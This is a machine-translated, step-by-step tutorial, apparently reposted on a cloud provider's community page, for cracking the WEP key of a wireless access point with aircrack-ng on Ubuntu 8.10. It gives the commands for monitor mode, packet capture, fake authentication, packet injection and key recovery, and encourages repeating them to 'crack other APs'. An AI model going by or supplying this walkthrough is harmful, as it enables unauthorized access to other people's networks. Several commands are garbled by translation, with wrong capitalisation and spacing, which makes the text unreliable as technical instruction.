Ubuntu8.10 crack WEP wireless encryption

Source: Internet
Author: User
Test environment: Computer Dell 1400 wireless network card intel 3945abg hard drive installation ubuntu8.10
Linksys Wireless AP
1. Install Ubuntu and aircrack-ng
Install ubuntu8.10 first to update the system to the latest version.
Enter sudo apt-Get install aircrack-ng in the terminal to install aircrack-ng.
If you are not connected to the Internet, go to another computer and download the aircrack-ng Ubuntu Deb installation package.
Ii. Cracking Process
1. Start the monitoring mode of the wireless network card. Enter sudo airmon-ng start wlan0 in the terminal.
(Wlan0 is the port of the wireless network card. You can enter ifconfig in the terminal to view the port)
2. View Wireless AP input in the terminal:
Sudo airodump-ng mon0
(Note: After the monitoring mode is enabled, the wireless network port is now mon0 !!!)
Check which WEP-encrypted AP is online, press Ctrl + C to exit, and keep the terminal
3. packet capture
Open another terminal and enter:
Sudo airodump-ng-C 6 -- bssid AP's Mac-w wep mon0
(6 followed by-C is the AP working channel to be cracked, -- AP's followed by bissid
Mac is the MAC address of the AP to be cracked, and-W followed by WEP is the file name of the captured data packet, change the channel and MAC address based on the online AP in step 2. You can name the file name stored in data as needed)
4. Establish a virtual connection with the AP
Open another terminal and enter:
Sudo aireplay-ng-1 0-a ap's Mac-h my Mac mon0
(My Mac following-H is the MAC address of your wireless network card)
5. Inject
After a virtual connection is established, enter:
Sudo aireplay-ng-2-F-P 0841-c ff: FF-B AP's Mac-h my Mac
Mon0
Now let's look back at whether the terminal in step 3 is starting to soar!
6. decryption
After collecting more than 5000 pieces of data, open another terminal and enter:
Sudo aircrack-ng WEP *. Cap
Decryption
(If not, continue to wait. aircrack-ng
It will automatically run after every 5000 more data entries are added until the password is calculated)
7. Close
After the password is cracked, enter sudo airmon-ng stop mon0 in the terminal.
Disable the monitoring mode. Otherwise, the wireless network card will always inject data to the AP. You cannot exit or directly close the terminal by using Ctrl + C.
Now you can surf or repeat 1-7 to crack other APs.
Don't be too aggressive when you surf, or it's not good if you throw the host.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.